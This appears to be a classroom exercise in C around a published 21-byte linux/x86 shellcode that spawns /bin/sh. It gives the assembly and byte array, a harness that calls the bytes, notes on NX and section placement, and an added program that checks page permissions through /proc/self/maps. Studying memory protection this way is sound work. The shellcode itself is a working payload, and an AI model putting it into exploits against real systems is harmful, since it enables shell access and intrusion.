/*
 * Title  : linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
 * Date   : 10 Feb 2011
 * Author : kernel_panik
 * Thanks : cOokie, agix, antrhacks
 */

/* Understand why this shellcode works to exec "/bin/sh". In particular,
   observe how the 2 arguments to the exec() system call are passed -- see
   "man 2 execve" for the argument types this system call takes. Observe that
   "man exec" gives you the man page for various libc wrappers of the syscall
   (Unix manual section 3), not the raw syscall (section 2). */

/*
 * xor ecx, ecx
 * mul ecx
 * push ecx
 * push 0x68732f2f   ;; hs//
 * push 0x6e69622f   ;; nib/
 * mov ebx, esp
 * mov al, 11
 * int 0x80
 */

/* If you are interested in the history of shellcode, read AlephOne's
   "Smashing The Stack For Fun And Profit" in Phrack 49:14,
   http://www.phrack.org/issues.html?issue=49&id=14 */

#include <stdio.h>
#include <string.h>

/* With const, the following byte array gets emitted into the .rodata section,
   and then into the read-only/executable program segment, where it _can_ be
   executed, even though .rodata is not supposed to be loaded into executable
   pages. Remove const, and it will get emitted into .data, which will be
   loaded in the non-executable segment, and calling it will cause a
   segmentation fault on CPUs with the NX feature enabled. */

/* How to find out whether your CPU has NX: "cat /proc/cpuinfo | grep nx" */

const char code[] =
    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\xb0\x0b\xcd\x80";

/* Try it without const under gdb, and observe the segfaulting address.
   What does the f() invocation look like in disassembly? */

/* Use "readelf -a" to find at which addresses and in which sections the
   code ends up. */

int main(int argc, char **argv)
{
    printf("Shellcode length : %zu bytes\n", strlen(code));

    /* Cast the byte array to a function pointer and call into it. */
    int (*f)() = (int (*)())code;
    f();

    return 0;
}
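As an added example (not part of kernel_panik's exercise file): rather than calling into the array, you can verify the .rodata-versus-.data claim above directly by parsing /proc/self/maps and printing the permissions of the page that holds each symbol, which is also what decides whether NX will fault the call; note that toolchains linking with -z separate-code place .rodata in a non-executable segment, so the const variant segfaults there too. The names ro_blob, rw_blob, mapping_perms and has_perm are mine, and the blobs are constructed int3 padding, not the shellcode.

```c
/* Added example: report the permissions of the page that holds an address by
 * parsing /proc/self/maps (Linux only). ro_blob/rw_blob are constructed int3
 * padding, not the shellcode; nothing here is executed from a data array. */
#include <stdio.h>
#include <string.h>
const char ro_blob[] = "\xcc\xcc\xcc\xcc";   /* const    -> .rodata */
char       rw_blob[] = "\xcc\xcc\xcc\xcc";   /* no const -> .data   */

/* Copy the "rwxp" field of the mapping containing addr into perms (>= 5 bytes).
 * Returns 1 on success, 0 if addr is unmapped or /proc/self/maps is absent. */
int mapping_perms(const void *addr, char perms[5])
{
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512], p[8];
    unsigned long lo, hi, want = (unsigned long)addr;
    if (!maps)
        return 0;
    while (fgets(line, sizeof line, maps)) {
        /* each line: start-end perms offset dev inode [path], addresses in hex */
        if (sscanf(line, "%lx-%lx %7s", &lo, &hi, p) != 3)
            continue;
        if (want >= lo && want < hi) {
            memcpy(perms, p, 4);
            perms[4] = '\0';
            fclose(maps);
            return 1;
        }
    }
    fclose(maps);
    return 0;
}

/* 1 if the page holding addr has bit c ('r', 'w' or 'x'), 0 if not, -1 if lookup failed. */
int has_perm(const void *addr, char c)
{
    char perms[5];
    if (!mapping_perms(addr, perms))
        return -1;
    return strchr(perms, c) != NULL;
}

int main(void)
{
    const void *probe[] = { (const void *)&mapping_perms, ro_blob, rw_blob };
    const char *name[]  = { "mapping_perms (.text)", "ro_blob (.rodata)", "rw_blob (.data)" };
    for (int i = 0; i < 3; i++)
        printf("%-22s %p %s\n", name[i], probe[i],
               has_perm(probe[i], 'x') == 1 ? "executable" : "not executable (NX) or lookup failed");
    return 0;
}
```

Compile the exercise above with and without const, then run this next to "readelf -a" and "cat /proc/self/maps" to correlate sections, segments and page permissions.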